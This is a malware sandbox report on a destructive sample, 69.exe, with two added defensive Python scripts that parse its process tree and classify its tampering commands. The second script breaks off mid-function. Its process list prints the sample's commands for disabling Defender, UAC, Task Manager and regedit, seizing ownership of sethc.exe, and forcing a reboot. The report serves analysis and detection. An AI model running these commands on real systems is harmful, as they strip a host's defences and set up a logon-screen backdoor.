Malware Analysis Report

2024-12-07 14:34

Sample ID 240921-xszn8aybqe
Target 69.exe
SHA256 6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Tags
discovery evasion execution exploit persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7

Threat Level: Known bad

The file 69.exe was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution exploit persistence ransomware trojan

UAC bypass

Possible privilege escalation attempt

Stops running service(s)

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Loads dropped DLL

Modifies system executable filetype association

Modifies file permissions

Executes dropped EXE

Enumerates connected drives

Drops file in System32 directory

Sets desktop wallpaper using registry

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-21 19:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-21 19:07

Reported

2024-09-21 19:08

Platform

win7-20240729-en

Max time kernel

7s

Max time network

7s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\PerfLogs\windows\exec.exe N/A
N/A N/A C:\PerfLogs\windows\jumpscare.exe N/A
N/A N/A C:\PerfLogs\windows\rnbowspam.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" C:\Windows\system32\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\V: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\N: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\L: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\P: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\T: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\U: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\X: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\H: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\G: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\K: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Q: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\S: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\A: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\E: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\I: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\J: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\M: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\O: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\R: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\W: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\B: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Z: C:\Program Files\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Y: C:\Program Files\Windows Media Player\wmplayer.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\reg.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\taskmgr.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\sethc.exe C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\regedit.exe C:\Windows\system32\cmd.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\69.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PerfLogs\windows\exec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PerfLogs\windows\jumpscare.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PerfLogs\windows\rnbowspam.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" C:\Windows\system32\reg.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\PerfLogs\windows\jumpscare.exe N/A
N/A N/A C:\PerfLogs\windows\rnbowspam.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: 33 N/A C:\Program Files\Windows Media Player\wmplayer.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\Windows Media Player\wmplayer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Windows Media Player\wmplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe
PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1276 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1276 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1276 wrote to memory of 760 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe
PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe
PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe
PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1676 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 1676 wrote to memory of 588 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe
PID 760 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 760 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 760 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\icacls.exe
PID 1676 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1676 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1676 wrote to memory of 1724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1676 wrote to memory of 604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1676 wrote to memory of 604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1676 wrote to memory of 604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
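The table above lists one row per WriteProcessMemory call, so every parent/child pair appears three or four times and the process tree is hard to read off. The script below is an added example, not part of the report or of the sandbox's own tooling: it parses rows in exactly this format, collapses the repeats while keeping the call count, and prints the tree. SAMPLE_ROWS is a subset of the rows above (with only the first three edges repeated) so the file stays short; the parsing assumptions are that a row always carries two drive-letter paths and that the "N/A" indicator column sits between the PIDs and the paths, as it does here.

```python
# Added example (not part of the sandbox report): rebuild the process tree from the
# "PID A wrote to memory of B" rows of the WriteProcessMemory signature table.
import re
from collections import Counter

# "PID 2632 wrote to memory of 2712 N/A <source image> <target image>"
ROW = re.compile(r"PID (\d+) wrote to memory of (\d+)\s+N/A\s+(.*)$")


def parse_rows(rows):
    """Return ({pid: image path}, Counter{(parent, child): number of writes})."""
    names, edges = {}, Counter()
    for row in rows:
        m = ROW.match(row.strip())
        if not m:
            continue
        src, dst = int(m.group(1)), int(m.group(2))
        # Image paths may contain spaces ("C:\Program Files\..."), so split only where
        # the next path starts with a drive letter instead of on every blank.
        paths = re.split(r"\s+(?=[A-Za-z]:\\)", m.group(3))
        if len(paths) == 2:
            names.setdefault(src, paths[0])
            names.setdefault(dst, paths[1])
        edges[(src, dst)] += 1   # same pair repeated = repeated calls, not new processes
    return names, edges


def render_tree(rows):
    """Indented tree (one string per process) rooted at PIDs that nobody wrote to."""
    names, edges = parse_rows(rows)
    children = {}
    for parent, child in edges:              # Counter keeps first-seen order
        children.setdefault(parent, []).append(child)
    has_parent = {child for _, child in edges}
    roots = [p for p in dict.fromkeys(p for p, _ in edges) if p not in has_parent]
    lines = []

    def walk(pid, depth, writes):
        tag = f"  [{writes} writes]" if writes else ""
        lines.append(f"{'  ' * depth}{pid} {names.get(pid, '?')}{tag}")
        for child in children.get(pid, []):
            walk(child, depth + 1, edges[(pid, child)])

    for root in roots:
        walk(root, 0, 0)
    return lines


# Subset of the rows in the report's WriteProcessMemory table (repeats kept for three edges).
SAMPLE_ROWS = [
    r"PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe",
    r"PID 2632 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\69.exe C:\Windows\SysWOW64\WScript.exe",
    r"PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe",
    r"PID 2712 wrote to memory of 2660 N/A C:\Windows\SysWOW64\WScript.exe C:\PerfLogs\windows\exec.exe",
    r"PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe",
    r"PID 2660 wrote to memory of 1676 N/A C:\PerfLogs\windows\exec.exe C:\Windows\system32\cmd.exe",
    r"PID 1676 wrote to memory of 1720 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\jumpscare.exe",
    r"PID 1676 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\PerfLogs\windows\rnbowspam.exe",
    r"PID 1676 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\takeown.exe",
    r"PID 1720 wrote to memory of 2376 N/A C:\PerfLogs\windows\jumpscare.exe C:\Windows\system32\cmd.exe",
    r"PID 2376 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Media Player\wmplayer.exe",
    r"PID 1380 wrote to memory of 1276 N/A C:\PerfLogs\windows\rnbowspam.exe C:\Windows\system32\cmd.exe",
    r"PID 1276 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe",
]

if __name__ == "__main__":
    print("\n".join(render_tree(SAMPLE_ROWS)))
```

Read against the full table, every edge pairs a process with a child it launches (69.exe → WScript.exe → exec.exe → cmd.exe → the dropped EXEs and the takeown/icacls/sc helpers) and the count per edge is a constant 3 or 4. That is the footprint a parent leaves in a child it has just created rather than of writing into an unrelated running process, so treat this signature as the report's process tree, not as injection evidence on its own.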

Processes

C:\Users\Admin\AppData\Local\Temp\69.exe

"C:\Users\Admin\AppData\Local\Temp\69.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"

C:\PerfLogs\windows\exec.exe

"C:\PerfLogs\windows\exec.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30C1.tmp\30C2.tmp\30C3.bat C:\PerfLogs\windows\exec.exe"

C:\PerfLogs\windows\jumpscare.exe

jumpscare.exe

C:\PerfLogs\windows\rnbowspam.exe

rnbowspam.exe

C:\Windows\System32\takeown.exe

takeown /f taskmgr.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311E.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\jumpscare.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\311F.tmp\311F.tmp\3120.bat C:\PerfLogs\windows\rnbowspam.exe"

C:\Windows\System32\takeown.exe

takeown /f sethc.exe

C:\Windows\System32\icacls.exe

icacls "sethc.exe" /granted "Admin":F

C:\Program Files\Windows Media Player\wmplayer.exe

wmplayer.exe "C:\PerfLogs\windows\tape.mp4"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K rainbow.bat

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\System32\icacls.exe

icacls "taskmgr.exe" /granted "Admin":F

C:\Windows\System32\takeown.exe

takeown /f reg.exe

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\System32\icacls.exe

icacls "reg.exe" /granted "Admin":F

C:\Windows\system32\takeown.exe

takeown /f regedit.exe

C:\Windows\system32\icacls.exe

icacls "regedit.exe" /granted "Admin":F

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K rainbow.bat

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\shutdown.exe

shutdown -r -t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K rainbow.bat

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1479522427372120-82456797910118033231390140125-4662704141658235516-1118853509"

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\timeout.exe

timeout /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x1
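The Processes list above is where the sample's real behaviour is: reg.exe writes that turn off UAC, Task Manager, the Registry Editor, cmd.exe and Defender, takeown/icacls runs against taskmgr.exe, sethc.exe, reg.exe and regedit.exe, sc.exe stopping and disabling WinDefend, and a forced reboot, padded with dozens of `timeout /t 0` calls. The script below is an added example, not part of the report or of the sandbox's signature engine: it classifies such command lines, and also the `Set value` rows from the Signatures section that use NT-native `\REGISTRY\MACHINE` and `\REGISTRY\USER\<SID>` paths, and names the control each one tampers with. SAMPLE_CMDLINES are copied from the Processes section; the ATT&CK technique IDs, POLICY_VALUES and WATCHED_BINARIES are this example's own assumptions. One caveat it builds in: the four icacls lines use `/granted`, which icacls does not accept (the switch is `/grant`), so the matcher keys on the executable and its target rather than on the switch.

```python
# Added example (not part of the sandbox report): map process command lines and
# 'Set value' registry rows to the defensive control each one tampers with.
# ATT&CK IDs, POLICY_VALUES and WATCHED_BINARIES are assumptions of this example.
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique ID (assumed mapping)
    summary: str    # effect on the host
    source: str     # command line or registry row that produced it


# value name -> (data that means "tampered", or None for any data; effect; technique)
POLICY_VALUES = {
    "enablelua": ("0", "UAC disabled", "T1548.002"),
    "disabletaskmgr": ("1", "Task Manager disabled", "T1562.001"),
    "disableregistrytools": ("1", "Registry Editor disabled", "T1562.001"),
    "disablecmd": (None, "cmd.exe blocked", "T1562.001"),
    "disableantispyware": ("1", "Defender disabled by policy", "T1562.001"),
    "disablerealtimemonitoring": ("1", "Defender real-time scanning disabled", "T1562.001"),
    "norun": ("1", "Run dialog hidden", "T1562.001"),
    "nocontrolpanel": ("1", "Control Panel blocked", "T1562.001"),
    "wallpaper": (None, "desktop wallpaper replaced", "T1491.001"),
    "nochangingwallpaper": ("1", "wallpaper locked", "T1491.001"),
}
# Accessibility helpers that SYSTEM launches from the logon screen, plus the admin tools
# this sample takes ownership of: ownership or ACL changes on these deserve a finding.
WATCHED_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe",
                    "displayswitch.exe", "taskmgr.exe", "reg.exe", "regedit.exe", "cmd.exe"}
HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE", "HKCR": "HKEY_CLASSES_ROOT"}


def tokenize(cmdline: str) -> list:
    """Split on whitespace, keeping double-quoted spans together (quotes stripped)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def base(token: str) -> str:
    """Lower-cased file name of a path token."""
    return token.rsplit("\\", 1)[-1].lower()


def registry_finding(key: str, value: Optional[str], data: Optional[str], src: str) -> Finding:
    """Shared classifier for one registry write, whichever notation it was logged in."""
    want, effect, tech = POLICY_VALUES.get((value or "").lower(), (None, None, "T1112"))
    if effect and (want is None or data == want):
        return Finding(tech, f"{effect} ({key}\\{value} = {data})", src)
    what = "file-type handler key" if key.upper().endswith("\\DEFAULTICON") else "registry value"
    return Finding("T1112", f"{what} changed: {key}\\{value or '(Default)'} = {data}", src)


def nt_to_hive(key: str) -> str:
    """Translate the NT-native key path the sandbox logs into reg.exe hive notation."""
    if key.upper().startswith("\\REGISTRY\\MACHINE\\"):
        return "HKEY_LOCAL_MACHINE\\" + key[len("\\REGISTRY\\MACHINE\\"):]
    m = re.match(r"\\REGISTRY\\USER\\S-1-5-[\d-]+\\(.*)", key, re.IGNORECASE)
    return "HKEY_CURRENT_USER\\" + m.group(1) if m else key  # hive of the logged-on SID


def analyze_registry_event(row: str) -> Optional[Finding]:
    """Classify a 'Set value (type) key = "data"' row from the Signatures tables."""
    m = re.match(r'Set value \(\w+\)\s+(\\REGISTRY\\.+?)\\([^\\=]+?)\s*=\s*"([^"]*)"', row)
    return registry_finding(nt_to_hive(m.group(1)), m.group(2), m.group(3), row) if m else None


def analyze(cmdline: str) -> Optional[Finding]:
    """Classify one process command line; None means nothing of interest (timeout, conhost)."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    exe = base(tokens[0])
    exe = exe[:-4] if exe.endswith(".exe") else exe
    args = [t.lower() for t in tokens[1:]]
    if exe == "reg" and args[:1] == ["add"] and len(tokens) > 2:
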